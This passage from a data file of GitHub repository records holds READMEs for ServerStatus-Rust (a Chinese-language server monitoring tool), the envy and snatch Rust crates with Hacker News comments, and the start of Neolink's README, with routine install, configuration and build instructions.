\u6ca1\u542f\u7528vnstat\u65f6\uff0c\u8868\u793a\u6708\u6d41\u91cf\u4ece\u6bcf\u6708\u54ea\u5929\u5f00\u59cb\u7edf\u8ba1\n# disabled = true \u5355\u673a\u7981\u7528\n# location \u652f\u6301\u56fd\u65d7 emoji https://emojixd.com/group/flags\n# \u6216\u56fd\u5bb6\u7f29\u5199\uff0c\u5982 cn us \u7b49\u7b49\uff0c\u6240\u6709\u56fd\u5bb6\u89c1\u76ee\u5f55 web/static/flags\n# \u81ea\u5b9a\u4e49\u6807\u7b7e labels = \"os=centos;ndd=2022/11/25;spec=2C/4G/60G;\"\n# os \u6807\u7b7e\u53ef\u9009\uff0c\u4e0d\u586b\u5219\u4f7f\u7528\u4e0a\u62a5\u6570\u636e\uff0cndd(next due date) \u4e0b\u6b21\u7eed\u8d39\u65f6\u95f4, spec \u4e3a\u4e3b\u673a\u89c4\u683c\n# os \u53ef\u7528\u503c centos debian ubuntu alpine pi arch windows linux\nhosts = [\n {name = \"h1\", password = \"p1\", alias = \"n1\", location = \"\ud83c\udfe0\", type = \"kvm\", labels = \"os=arch;ndd=2022/11/25;spec=2C/4G/60G;\"},\n {name = \"h2\", password = \"p2\", alias = \"n2\", location = \"\ud83c\udfe2\", type = \"kvm\", disabled = false},\n {name = \"h3\", password = \"p3\", alias = \"n3\", location = \"\ud83c\udfe1\", type = \"kvm\", monthstart = 1},\n {name = \"h4\", password = \"p4\", alias = \"n4\", location = \"cn\", type = \"kvm\", notify = true, labels = \"ndd=2022/11/25;spec=2C/4G/60G;\"},\n]\n\n# \u52a8\u6001\u6ce8\u518c\u6a21\u5f0f\uff0c\u4e0d\u518d\u9700\u8981\u9488\u5bf9\u6bcf\u4e00\u4e2a\u4e3b\u673a\u505a\u5355\u72ec\u914d\u7f6e\n# gid \u4e3a\u6a21\u677f\u7ec4id, \u52a8\u6001\u6ce8\u518c\u552f\u4e00\u6807\u8bc6\uff0c\u4e0d\u53ef\u91cd\u590d\nhosts_group = [\n # \u53ef\u4ee5\u6309\u56fd\u5bb6\u5730\u533a\u6216\u7528\u9014\u6765\u505a\u5206\u7ec4\n {gid = \"g1\", password = \"pp\", location = \"\ud83c\udfe0\", type = \"kvm\", notify = true},\n {gid = \"g2\", password = \"pp\", location = \"\ud83c\udfe2\", type = \"kvm\", notify = true},\n # \u4f8b\u5982\u4e0d\u53d1\u9001\u901a\u77e5\u53ef\u4ee5\u5355\u72ec\u505a\u4e00\u7ec4\n {gid = \"silent\", password = \"pp\", location = \"\ud83c\udfe1\", type = \"kvm\", notify = false},\n]\n# \u52a8\u6001\u6ce8\u518c\u6a21\u5f0f\u4e0b\uff0c\u65e0\u6548\u6570\u636e\u6e05\u7406\u95f4\u9694\uff0c\u9ed8\u8ba4 30s\ngroup_gc = 30\n\n# \u4e0d\u5f00\u542f\u544a\u8b66\uff0c\u53ef\u5ffd\u7565\u540e\u9762\u914d\u7f6e\uff0c\u6216\u8005\u5220\u9664\u4e0d\u9700\u8981\u7684\u901a\u77e5\u65b9\u5f0f\n# \u544a\u8b66\u95f4\u9694\u9ed8\u8ba4\u4e3a30s\nnotify_interval = 30\n# https://core.telegram.org/bots/api\n# https://jinja.palletsprojects.com/en/3.0.x/templates/#if\n[tgbot]\n# \u5f00\u5173 true \u6253\u5f00\nenabled = false\nbot_token = \"\"\nchat_id = \"\"\n# host \u53ef\u7528\u5b57\u6bb5\u89c1 payload.rs \u6587\u4ef6 HostStat \u7ed3\u6784, {{host.xxx}} \u4e3a\u5360\u4f4d\u53d8\u91cf\n# \u4f8b\u5982 host.name \u53ef\u66ff\u6362\u4e3a host.alias\uff0c\u5927\u5bb6\u6839\u636e\u81ea\u5df1\u7684\u559c\u597d\u6765\u7f16\u5199\u901a\u77e5\u6d88\u606f\n# {{ip_info.query}} \u4e3b\u673a ip, {{sys_info.host_name}} \u4e3b\u673a hostname\ntitle = \"\u2757Server Status\"\nonline_tpl = \"{{config.title}} \\n\ud83d\ude06 {{host.location}} {{host.name}} \u4e3b\u673a\u6062\u590d\u4e0a\u7ebf\u5566\"\noffline_tpl = \"{{config.title}} \\n\ud83d\ude31 {{host.location}} {{host.name}} \u4e3b\u673a\u5df2\u7ecf\u6389\u7ebf\u5566\"\n# custom \u6a21\u677f\u7f6e\u7a7a\u5219\u505c\u7528\u81ea\u5b9a\u4e49\u544a\u8b66\uff0c\u53ea\u4fdd\u7559\u4e0a\u4e0b\u7ebf\u901a\u77e5\ncustom_tpl = \"\"\"\n{% if host.memory_used / host.memory_total > 0.5 %}\n
\ud83d\ude32 {{host.name}} \u4e3b\u673a\u5185\u5b58\u4f7f\u7528\u7387\u8d8550%, \u5f53\u524d{{ (100 * host.memory_used / host.memory_total) | round }}%  
\n{% endif %}\n\n{% if host.hdd_used / host.hdd_total > 0.5 %}\n
\ud83d\ude32 {{host.name}} \u4e3b\u673a\u786c\u76d8\u4f7f\u7528\u7387\u8d8550%, \u5f53\u524d{{ (100 * host.hdd_used / host.hdd_total) | round }}% 
\n{% endif %}\n\"\"\"\n\n# wechat, email, webhook \u7b49\u5176\u5b83\u901a\u77e5\u65b9\u5f0f \u914d\u7f6e\u8be6\u7ec6\u89c1 config.toml\n```\n\n### 3.2 \u670d\u52a1\u7aef\u8fd0\u884c\n```bash\n# systemd \u65b9\u5f0f\uff0c \u53c2\u7167 one-touch.sh \u811a\u672c (\u63a8\u8350)\n\n# \ud83d\udcaa \u624b\u52a8\u65b9\u5f0f\n# help\n./stat_server -h\n# \u624b\u52a8\u8fd0\u884c\n./stat_server -c config.toml\n# \u6216\nRUST_BACKTRACE=1 RUST_LOG=trace ./stat_server -c config.toml\n\n# \u6d4b\u8bd5\u914d\u7f6e\u6587\u4ef6\u662f\u5426\u6709\u6548\n./stat_server -c config.toml -t\n# \u6839\u636e\u914d\u7f6e\u53d1\u9001\u6d4b\u8bd5\u6d88\u606f\uff0c\u9a8c\u8bc1\u901a\u77e5\u662f\u5426\u751f\u6548\n./stat_server -c config.toml --notify-test\n\n# \ud83d\udc33 docker \u65b9\u5f0f\nwget --no-check-certificate -qO docker-compose.yml 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/docker-compose.yml'\nwget --no-check-certificate -qO config.toml 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/config.toml'\ntouch stats.json\ndocker-compose up -d\n```\n\n## 4. \u5ba2\u6237\u7aef\u8bf4\u660e\n\n### 4.1 Linux (`CentOS`, `Ubuntu`, `Debian`)\n```bash\n# \u516c\u7f51\u73af\u5883\u5efa\u8bae headscale/nebula \u7ec4\u7f51\u6216\u8d70 https, \u4f7f\u7528 nginx \u5bf9 server \u5957 ssl \u548c\u81ea\u5b9a\u4e49 location /report\n# Rust \u7248\u53ea\u5728 CentOS, Ubuntu, Debian \u6d4b\u8bd5\u8fc7\n# alpine linux \u9700\u8981\u5b89\u88c5\u76f8\u5173\u547d\u4ee4 apk add procps iproute2 coreutils\n# \u5982\u679c Rust \u7248\u5ba2\u6237\u7aef\u5728\u4f60\u7684\u7cfb\u7edf\u65e0\u6cd5\u4f7f\u7528\uff0c\u8bf7\u5207\u6362\u5230\u4e0b\u9762 4.2 \u8de8\u5e73\u53f0\u7248\u672c\n\n# systemd \u65b9\u5f0f\uff0c \u53c2\u7167 one-touch.sh \u811a\u672c (\u63a8\u8350)\n\n# \ud83d\udcaa \u624b\u52a8\u65b9\u5f0f\n# Rust \u7248\u672c Client\n./stat_client -h\n./stat_client -a \"http://127.0.0.1:8080/report\" -u h1 -p p1\n# \u6216\n./stat_client -a \"grpc://127.0.0.1:9394\" -u h1 -p p1\n\n# rust client \u53ef\u7528\u53c2\u6570\n./stat_client -h\nOPTIONS:\n -6, --ipv6 ipv6 only, default:false\n -a, --addr [default: http://127.0.0.1:8080/report]\n --alias alias for host [default: unknown]\n --cm China Mobile probe addr [default: cm.tz.cloudcpp.com:80]\n --ct China Telecom probe addr [default: ct.tz.cloudcpp.com:80]\n --cu China Unicom probe addr [default: cu.tz.cloudcpp.com:80]\n --disable-extra disable extra info report, default:false\n --disable-notify disable notify, default:false\n --disable-ping disable ping, default:false\n --disable-tupd disable t/u/p/d, default:false\n -g, --gid group id [default: ]\n -h, --help Print help information\n --ip-info show ip info, default:false\n --sys-info show sys info, default:false\n --json use json protocol, default:false\n --location location [default: ]\n -n, --vnstat enable vnstat, default:false\n --vnstat-mr vnstat month rotate 1-28 [default: 1]\n -p, --pass password [default: p1]\n -t, --type host type [default: ]\n -u, --user username [default: h1]\n -V, --version Print version information\n -w, --weight weight for rank [default: 0]\n\n# \u4e00\u4e9b\u53c2\u6570\u8bf4\u660e\n--ip-info # \u663e\u793a\u672c\u673aip\u4fe1\u606f\u540e\u7acb\u5373\u9000\u51fa\uff0c\u76ee\u524d\u4f7f\u7528 ip-api.com \u6570\u636e\n--sys-info # \u663e\u793a\u672c\u673a\u7cfb\u7edf\u4fe1\u606f\u540e\u7acb\u5373\u9000\u51fa\n--disable-extra # \u4e0d\u4e0a\u62a5\u7cfb\u7edf\u4fe1\u606f\u548cIP\u4fe1\u606f\n--disable-ping # \u505c\u7528\u4e09\u7f51\u5ef6\u65f6\u548c\u4e22\u5305\u7387\u63a2\u6d4b\n--disable-tupd # \u4e0d\u4e0a\u62a5 tcp/udp/\u8fdb\u7a0b\u6570/\u7ebf\u7a0b\u6570\uff0c\u51cf\u5c11CPU\u5360\u7528\n-w, --weight # \u6392\u5e8f\u52a0\u5206\uff0c\u5fae\u8c03\u8ba9\u4e3b\u673a\u9760\u524d\u663e\u793a\uff0c\u65e0\u5f3a\u8feb\u75c7\u53ef\u5ffd\u7565\n-g, --gid # \u52a8\u6001\u6ce8\u518c\u7684\u7ec4id\n--alias # \u52a8\u6001\u6ce8\u518c\u6a21\u5f0f\u4e0b\uff0c\u6307\u5b9a\u4e3b\u673a\u7684\u5c55\u793a\u540d\u5b57\n# \u603b\u6d41\u91cf\uff0c\u7f51\u5361\u6d41\u91cf/\u7f51\u901f\u7edf\u8ba1\n-i, --iface # \u975e\u7a7a\u65f6\uff0c\u53ea\u7edf\u8ba1\u6307\u5b9a\u7f51\u53e3\n-e, --exclude-iface # \u6392\u9664\u6307\u5b9a\u7f51\u53e3\uff0c\u9ed8\u8ba4\u6392\u9664 \"lo,docker,vnet,veth,vmbr,kube,br-\"\n```\n\n### 4.2 \u8de8\u5e73\u53f0\u7248\u672c (`Window`, `Linux`, `...`)\n\n
\n \u8de8\u5e73\u53f0\u7248\u672c\u8bf4\u660e\n\n```bash\n# Python \u7248\u672c Client \u4f9d\u8d56\u5b89\u88c5\n## Centos\nyum -y install epel-release\nyum -y install python3-pip gcc python3-devel\npython3 -m pip install psutil requests py-cpuinfo\n\n## Ubuntu/Debian\napt -y install python3-pip\npython3 -m pip install psutil requests py-cpuinfo\n\n## Alpine linux\napk add wget python3 py3-pip gcc python3-dev musl-dev linux-headers\napk add procps iproute2 coreutils\npython3 -m pip install psutil requests py-cpuinfo\n\nwget --no-check-certificate -qO stat_client.py 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/client/stat_client.py'\n\n## Windows\n# \u5b89\u88c5 python 3.10 \u7248\u672c\uff0c\u5e76\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\n# \u547d\u4ee4\u884c\u6267\u884c pip install psutil requests\n# \u4e0b\u8f7d https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/client/stat_client.py\npip install psutil requests py-cpuinfo\n\npython3 stat_client.py -h\npython3 stat_client.py -a \"http://127.0.0.1:8080/report\" -u h1 -p p1\n```\n
\n\n## 5. \u5f00\u542f `vnstat` \u652f\u6301\n[vnstat](https://zh.wikipedia.org/wiki/VnStat) \u662fLinux\u4e0b\u4e00\u4e2a\u6d41\u91cf\u7edf\u8ba1\u5de5\u5177\uff0c\u5f00\u542f `vnstat` \u540e\uff0c`server` \u5b8c\u5168\u4f9d\u8d56\u5ba2\u6237\u673a\u7684 `vnstat` \u6570\u636e\u6765\u663e\u793a\u6708\u6d41\u91cf\u548c\u603b\u6d41\u91cf\uff0c\u4f18\u70b9\u662f\u91cd\u542f\u4e0d\u4e22\u6d41\u91cf\u6570\u636e\u3002\n\n
\n \u5f00\u542f vnstat \u8bbe\u7f6e\n\n```bash\n# \u5728client\u7aef\u5b89\u88c5 vnstat\n## Centos\nsudo yum install epel-release -y\nsudo yum install -y vnstat\n## Ubuntu/Debian\nsudo apt install -y vnstat\n\n# \u4fee\u6539 /etc/vnstat.conf\n# BandwidthDetection 0\n# MaxBandwidth 0\n# \u9ed8\u8ba4\u4e0d\u662f eth0 \u7f51\u53e3\u7684\u9700\u8981\u7f6e\u7a7a Interface \u6765\u81ea\u52a8\u9009\u62e9\u7f51\u53e3\n# \u6ca1\u62a5\u9519\u4e00\u822c\u4e0d\u9700\u8981\u6539\n# Interface \"\"\nsystemctl restart vnstat\n\n# \u786e\u4fdd version >= 2.6\nvnstat --version\n# \u6d4b\u8bd5\u67e5\u770b\u6708\u6d41\u91cf (\u521a\u5b89\u88c5\u53ef\u80fd\u9700\u7b49\u4e00\u5c0f\u6bb5\u65f6\u95f4\u6765\u91c7\u96c6\u6570\u636e)\nvnstat -m\nvnstat --json m\n\n# client \u4f7f\u7528 -n \u53c2\u6570\u5f00\u542f vnstat \u7edf\u8ba1\n./stat_client -a \"grpc://127.0.0.1:9394\" -u h1 -p p1 -n\n# \u6216\npython3 stat_client.py -a \"http://127.0.0.1:8080/report\" -u h1 -p p1 -n\n```\n
\n\n## 6. FAQ\n\n
\n \u5982\u4f55\u4f7f\u7528\u81ea\u5b9a\u4e49\u4e3b\u9898\n\n\u66f4\u7b80\u5355\u7684\u65b9\u5f0f \ud83d\udc49 [#37](https://github.com/zdz/ServerStatus-Rust/discussions/37)\n\n```nginx\nserver {\n # ssl, domain \u7b49\u5176\u5b83 nginx \u914d\u7f6e\n\n # \u53cd\u4ee3 /report \u8bf7\u6c42\n location = /report {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\n proxy_set_header X-Forwarded-Proto $scheme;\n proxy_set_header X-Forwarded-Host $host;\n proxy_set_header X-Forwarded-Port $server_port;\n\n proxy_pass http://127.0.0.1:8080/report;\n }\n # \u53cd\u4ee3 json \u6570\u636e\u8bf7\u6c42\n location = /json/stats.json {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\n proxy_set_header X-Forwarded-Proto $scheme;\n proxy_set_header X-Forwarded-Host $host;\n proxy_set_header X-Forwarded-Port $server_port;\n\n proxy_pass http://127.0.0.1:8080/json/stats.json;\n }\n # v1.4.0\u540e\uff0c\u540c\u6837\u9700\u8981\u53cd\u4ee3 /detail, /map\n\n # \u5176\u5b83 html,js,css \u7b49\uff0c\u8d70\u672c\u5730\u6587\u672c\n location / {\n root /opt/ServerStatus/web; # \u4f60\u81ea\u5df1\u4fee\u6539\u7684\u4e3b\u9898\u76ee\u5f55\n index index.html index.htm;\n }\n}\n```\n
\n\n
\n \u5982\u4f55\u6e90\u7801\u7f16\u8bd1\n\n```bash\n# \u6309\u63d0\u793a\u5b89\u88c5 rust \u7f16\u8bd1\u5668\ncurl https://sh.rustup.rs -sSf | sh\nyum install -y openssl-devel\ngit clone https://github.com/zdz/ServerStatus-Rust.git\ncd ServerStatus-Rust\ncargo build --release\n# \u7f16\u8bd1\u597d\u7684\u6587\u4ef6\u76ee\u5f55 target/release\n```\n
\n\n
\n \u5982\u4f55\u81ea\u5b9a\u4e49 ping \u5730\u5740\n\n```bash\n# \u4f8b\u5982\u81ea\u5b9a\u4e49\u79fb\u52a8\u63a2\u6d4b\u5730\u5740\uff0c\u7528 --cm \u6307\u5b9a\u5730\u5740\n./stat_client -a \"grpc://127.0.0.1:9394\" -u h1 -p p1 --cm=cm.tz.cloudcpp.com:80\n\n# \u7535\u4fe1\u8054\u901a\u53c2\u6570\u53ef\u4ee5\u4f7f\u7528 -h \u547d\u4ee4\u67e5\u770b\n./stat_client -h\nOPTIONS:\n --cm China Mobile probe addr [default: cm.tz.cloudcpp.com:80]\n --ct China Telecom probe addr [default: ct.tz.cloudcpp.com:80]\n --cu China Unicom probe addr [default: cu.tz.cloudcpp.com:80]\n```\n
\n\n
\n \u5173\u4e8e\u8fd9\u4e2a\u8f6e\u5b50\n\n \u4e4b\u524d\u4e00\u76f4\u5728\u4f7f\u7528 `Prometheus` + `Grafana` + `Alertmanager` + `node_exporter` \u505aVPS\u76d1\u63a7\uff0c\u8fd9\u4e5f\u662f\u4e1a\u754c\u6bd4\u8f83\u6210\u719f\u7684\u76d1\u63a7\u65b9\u6848\uff0c\u7528\u8fc7\u4e00\u6bb5\u65f6\u95f4\u540e\uff0c\u53d1\u73b0\u975e\u751f\u4ea7\u73af\u5883\uff0c\u5f88\u591a\u76d1\u63a7\u6307\u6807\u90fd\u7528\u4e0d\u4e0a\uff0c\u8fd0\u7ef4\u6210\u672c\u6709\u70b9\u5927\u3002\n \u800c `ServerStatus` \u5f88\u597d\uff0c\u8db3\u591f\u7b80\u5355\u548c\u8f7b\u91cf\uff0c\u4e00\u773c\u53ef\u4ee5\u770b\u5c3d\u6240\u6709\u5c0f\u673a\u673a\uff0c\u53ea\u662f `c++` \u7248\u672c\u5f88\u4e45\u6ca1\u8fed\u4ee3\u8fc7\uff0c\u81ea\u5df1\u7684\u4e00\u4e9b\u9700\u6c42\u5728\u539f\u7248\u4e0a\u4e0d\u662f\u5f88\u597d\u4fee\u6539\uff0c\u5982\u81ea\u5e26 `tcp` \u4e0a\u62a5\u5bf9\u8de8\u533a\u673a\u5668\u4e0d\u662f\u5f88\u53cb\u597d\uff0c\u4e5f\u4e0d\u65b9\u4fbf\u5bf9\u4e0a\u62a5\u7684\u94fe\u8def\u505a\u4f18\u5316 \u7b49\u7b49\u3002\u8fd9\u662f\u5b66\u4e60 `Rust` \u7ec3\u624b\u7684\u5c0f\u9879\u76ee\uff0c\u6240\u4ee5\u4e0d\u4f1a\u589e\u52a0\u590d\u6742\u529f\u80fd\uff0c\u4fdd\u6301\u5c0f\u800c\u7f8e\uff0c\u7b80\u5355\u90e8\u7f72\uff0c\u914d\u5408 [Uptime Kuma](https://github.com/louislam/uptime-kuma) \u57fa\u672c\u4e0a\u53ef\u4ee5\u6ee1\u8db3\u4e2a\u4eba\u5927\u90e8\u5206\u76d1\u63a7\u9700\u6c42\u3002\n\n
\n\n## 7. \u76f8\u5173\u9879\u76ee\n- https://github.com/BotoX/ServerStatus\n- https://github.com/cppla/ServerStatus\n- https://github.com/mojeda/ServerStatus\n- https://github.com/cokemine/ServerStatus-Hotaru\n- https://github.com/ToyoDAdoubiBackup/ServerStatus-Toyo\n\n## 8. \u6700\u540e\n\n \u5f88\u9ad8\u5174\u6211\u7684\u4ee3\u7801\u80fd\u8dd1\u5728\u4f60\u7684\u670d\u52a1\u5668\u4e0a\uff0c\u5982\u679c\u5bf9\u4f60\u6709\u5e2e\u52a9\u7684\u8bdd\uff0c\u6b22\u8fce\u7559\u4e0b\u4f60\u7684 star \u2b50 \u652f\u6301\u4e00\u4e0b\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "softprops/envy", "link": "https://github.com/softprops/envy", "tags": ["rust", "serde", "envy", "configuration", "env", "12-factor"], "stars": 658, "description": "deserialize env vars into typesafe structs with rust", "lang": "Rust", "repo_lang": "", "readme": "# envy [![Github Actions](https://github.com/softprops/envy/workflows/Main/badge.svg)](https://github.com/softprops/envy/actions) [![Coverage Status](https://coveralls.io/repos/github/softprops/envy/badge.svg?branch=master)](https://coveralls.io/github/softprops/envy?branch=master) [![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg)](LICENSE) [![crates.io](http://meritbadge.herokuapp.com/envy)](https://crates.io/crates/envy) [![Latest API docs](https://img.shields.io/badge/docs-latest-green.svg)](https://softprops.github.io/envy)\n\n> deserialize environment variables into typesafe structs\n\n## \ud83d\udce6 install\n\nAdd the following to your `Cargo.toml` file.\n\n```toml\n[dependencies]\nenvy = \"0.4\"\n```\n\n## \ud83e\udd38 usage\n\nA typical envy usage looks like the following. Assuming your rust program looks something like this...\n\n> \ud83d\udca1 These examples use Serde's [derive feature](https://serde.rs/derive.html)\n\n```rust\nuse serde::Deserialize;\n\n#[derive(Deserialize, Debug)]\nstruct Config {\n foo: u16,\n bar: bool,\n baz: String,\n boom: Option\n}\n\nfn main() {\n match envy::from_env::() {\n Ok(config) => println!(\"{:#?}\", config),\n Err(error) => panic!(\"{:#?}\", error)\n }\n}\n```\n\n... export some environment variables\n\n```bash\n$ FOO=8080 BAR=true BAZ=hello yourapp\n```\n\nYou should be able to access a completely typesafe config struct deserialized from env vars.\n\nEnvy assumes an env var exists for each struct field with a matching name in all uppercase letters. i.e. A struct field `foo_bar` would map to an env var named `FOO_BAR`.\n\nStructs with `Option` type fields will successfully be deserialized when their associated env var is absent.\n\nEnvy also supports deserializing `Vecs` from comma separated env var values.\n\nBecause envy is built on top of serde, you can use all of serde's [attributes](https://serde.rs/attributes.html) to your advantage.\n\nFor instance let's say your app requires a field but would like a sensible default when one is not provided.\n```rust\n\n/// provides default value for zoom if ZOOM env var is not set\nfn default_zoom() -> u16 {\n 32\n}\n\n#[derive(Deserialize, Debug)]\nstruct Config {\n foo: u16,\n bar: bool,\n baz: String,\n boom: Option,\n #[serde(default=\"default_zoom\")]\n zoom: u16\n}\n```\n\nThe following will yield an application configured with a zoom of 32\n\n```bash\n$ FOO=8080 BAR=true BAZ=hello yourapp\n```\n\nThe following will yield an application configured with a zoom of 10\n\n```bash\n$ FOO=8080 BAR=true BAZ=hello ZOOM=10 yourapp\n```\n\nThe common pattern for prefixing env var names for a specific app is supported using\nthe `envy::prefixed(prefix)` interface. Asumming your env vars are prefixed with `APP_`\nthe above example may instead look like\n\n```rust\nuse serde::Deserialize;\n\n#[derive(Deserialize, Debug)]\nstruct Config {\n foo: u16,\n bar: bool,\n baz: String,\n boom: Option\n}\n\nfn main() {\n match envy::prefixed(\"APP_\").from_env::() {\n Ok(config) => println!(\"{:#?}\", config),\n Err(error) => panic!(\"{:#?}\", error)\n }\n}\n```\n\nthe expectation would then be to export the same environment variables prefixed with `APP_`\n\n```bash\n$ APP_FOO=8080 APP_BAR=true APP_BAZ=hello yourapp\n```\n\n> \ud83d\udc6d Consider this crate a cousin of [envy-store](https://github.com/softprops/envy-store), a crate for deserializing AWS parameter store values into typesafe structs and [recap](https://github.com/softprops/recap), a crate for deserializing named regex capture groups into typesafe structs.\n\nDoug Tangren (softprops) 2016-2019\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "derniercri/snatch", "link": "https://github.com/derniercri/snatch", "tags": ["rust", "downloader", "accelerator", "side-project", "awesome"], "stars": 658, "description": "A simple, fast and interruptable download accelerator, written in Rust", "lang": "Rust", "repo_lang": "", "readme": " ![build status](https://api.travis-ci.org/derniercri/snatch.svg?branch=devel)\n\n# snatch\nA simple, fast and interruptable download accelerator, written in Rust\n\n## WARNING\n\n**This project is no longer maintained by @k0pernicus and @jean-serge.** \n**Instead of Snatch, you can use, report features or issues and/or contribute to [Zou](https://github.com/k0pernicus/zou).**\n\n![Snatch logo](./img/snatch-horizontal.png)\n\n(A special thanks to [@fh-d](https://github.com/fh-d) for this awesome logo !)\n\n## Current features\n\n* **Simple**: a command line tool to manage easily your downloads ;\n* **Fast**: multithreading support.\n\n**NOTE**: _Snatch_ is on _alpha_ version. This version runs well on remote contents with a length known **before** the download (with the `content-length` header from the server response) - also, the _Interruptable_ feature is not implemented yet.\n\n## Installation\n\n1. Install Rust and Cargo using [rustup](https://www.rustup.rs/) ;\n2. You can download two versions of _Snatch_ : \n * the latest build from [crates.io](https://crates.io/): `cargo install\n snatch` ;\n * the last commit version from Github: `cargo install --git https://github.com/derniercri/snatch.git --branch devel` ;\n3. Enjoy !\n\n## Usage\n\n```\nSnatch 0.1.2\nSnatch, a simple, fast and interruptable download accelerator, written in Rust.\n\nUSAGE:\n snatch [FLAGS] [OPTIONS] \n\nFLAGS:\n -d, --debug Activate the debug mode\n --force Assume Yes to all queries and do not prompt\n -h, --help Prints help information\n -V, --version Prints version information\n\nOPTIONS:\n -f, --file The local file to save the remote content file\n -t, --threads Threads which can be used to download\n\nARGS:\n \n```\n\n## Screenshot\n\n![example](./img/snatch_devel.gif)\n\n## File examples\n\n* [A simple PDF file](http://www.cbu.edu.zm/downloads/pdf-sample.pdf)\n* [Big Buck Bunny](http://distribution.bbb3d.renderfarming.net/video/mp4/bbb_sunflower_1080p_60fps_stereo_abl.mp4), a big free mp4 file\n* [The cat DNA](http://hgdownload.cse.ucsc.edu/goldenPath/felCat8/bigZips/felCat8.fa.gz), a big .gz file\n* [A big PDF file from Princeton](http://scholar.princeton.edu/sites/default/files/oversize_pdf_test_0.pdf)\n\n## Contributing\n\nYou want to contribute to _Snatch_ ?\nHere are a few ways you can help us out :\n\n* improve the documentation,\n* improve the CLI,\n* add new features (please to see our issues),\n* report bugs.\n\nIf you want to create a pull request, this is the procedure to make it great:\n\n* create an issue to explain the problem you encountered (except for typo),\n* fork the project,\n* create a local branch to make changes (from our `devel` branch),\n* test your changes,\n* create a pull request (please compare it with our `devel` branch),\n* explain your changes,\n* submit !\n\nThank you for your interest in contributing to _Snatch_ ! :-D\n\n## Changelogs\n\n* 0.1.3 (**current**)\n * Fix the behaviour to know if the download is OK or not\n * Delete automatically the file if the download is not OK\n * Fix the behaviour when downloading a file using zero thread (yes, that was possible...)\n * Fix the behaviour when downloading a file using one thread\n * Monothreading download if the remote server does not support PartialContent headers\n\n* 0.1.2 (`2ee85c151167770ce0a71245e72c02497625087f`) \n No changelogs reported\n \n* 0.1.1 (`624a59d23e28d369bae2f9d30ea22db197f7e729`) \n No changelogs reported\n\n* 0.1.0 \n No changelogs reported\n\n## Build issues\n\n* Libraries cannot be build\nPlease go check if you are using the latest version of `rustc` (stable), running `rustup update`.\n\n* `fatal error: 'openssl/hmac.h' file not found`\nIf you are on a GNU/Linux distribution (like Ubuntu), please install `libssl-dev`.\nIf you are on macOS, please install `openssl` and check your OpenSSL configuration:\n\n```\nbrew install openssl\nexport OPENSSL_INCLUDE_DIR=`brew --prefix openssl`/include\nexport OPENSSL_LIB_DIR=`brew --prefix openssl`/lib\nexport DEP_OPENSSL_INCLUDE=`brew --prefix openssl`/include\n```\n", "readme_type": "markdown", "hn_comments": "Downloading from several mirrors at once makes sense, but using \"download accelerators\" to cheat on TCP congestion control is just wrong. Some mirrors will even ban you for making more than 4 connections at once.Wow, does download accelerators still exist? I remember using them back in the days on my 56k modem. I guess it still makes sense though if your home internet is faster than what the server allows per connection. Usually you don't need it anyway because today most things are already fast enough.Prozilla[1] is still one of the best and tiniest download managers I've ever seen. Blazingly fast. Squeezes as much speed as allowed by your ISP if throttled.[1] https://github.com/totosugito/prozilla-2.0.4> Fast: written in a new exciting programing language ;IMO change this description, it's rather strange...You can use prettier progress bar symbols, in terminals which support Unicode.See https://en.wikipedia.org/wiki/List_of_Unicode_characters#Blo...It's product names like this that discourage young women from going into computer science.If you are serious, you can alternately use aria2 https://aria2.github.io/. Aria2 has been around for a long time and is quite robust and feature complete. It makes a compelling replacement for curl and wget.Its 2017 do we really need download accelerators? I remember them from 10 years ago when you really could get more out of your connection or more like more from the servers by downloading multiple chucks at once.Looks like someone is exited to code in Rust, thats great but I see no need for this.My biggest pet peeve with projects is when the feature list is actually a mix of features and things that are \"upcoming\"/\"to be supported.\" This feature list isn't really a feature list either: it's just \"simple\" and \"fast\" (but fast is just 'written in a new exciting programming language'). Interruption and resuming is the first actual feature, but that's \"soon.\"Feature lists should be feature lists. On open source projects especially, I've seen \"soon\" take weeks or months. Move features that aren't features into a \"upcoming\" or \"planned\" block or make an issue, but don't list it as a feature when it isn't implemented.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thirtythreeforty/neolink", "link": "https://github.com/thirtythreeforty/neolink", "tags": ["rtsp", "rtsp-server", "reolink"], "stars": 658, "description": "An RTSP bridge to Reolink IP cameras", "lang": "Rust", "repo_lang": "", "readme": "# Neolink\n\n![CI](https://github.com/thirtythreeforty/neolink/workflows/CI/badge.svg)\n\nNeolink is a small program that acts as a proxy between Reolink IP cameras and\nnormal RTSP clients.\nCertain cameras, such as the Reolink B800, do not implement ONVIF or RTSP, but\ninstead use a proprietary \"Baichuan\" protocol only compatible with their apps\nand NVRs (any camera that uses \"port 9000\" will likely be using this protocol).\nNeolink allows you to use NVR software such as Shinobi or Blue Iris to receive\nvideo from these cameras instead.\nThe Reolink NVR is not required, and the cameras are unmodified.\nYour NVR software connects to Neolink, which forwards the video stream from the\ncamera.\n\nThe Neolink project is not affiliated with Reolink in any way; everything it\ndoes has been reverse engineered.\n\n## Supported cameras\n\nNeolink intends to support all Reolink cameras that do not provide native RTSP.\nCurrently it has been tested on the following cameras:\n\n- B800/D800\n- B400/D400\n- E1\n- Lumus\n- 510A\n\nNeolink does not support other cameras such as the RLC-420, since they already\n[provide native RTSP](https://support.reolink.com/hc/en-us/articles/360007010473-How-to-Live-View-Reolink-Cameras-via-VLC-Media-Player).\n\n## Usage\n\n1. First, write a configuration yaml file describing your cameras. See the\nConfiguration section below or the provided sample config.\n\n2. Launch Neolink:\n```bash\nneolink rtsp --config=your_config.yaml\n```\n\n3. Then, connect your RTSP viewer to `rtsp://127.0.0.1:8554/your_camera_name`!\n\n### Additional commands\n\nNeolink also has some additional command line tools\nfor 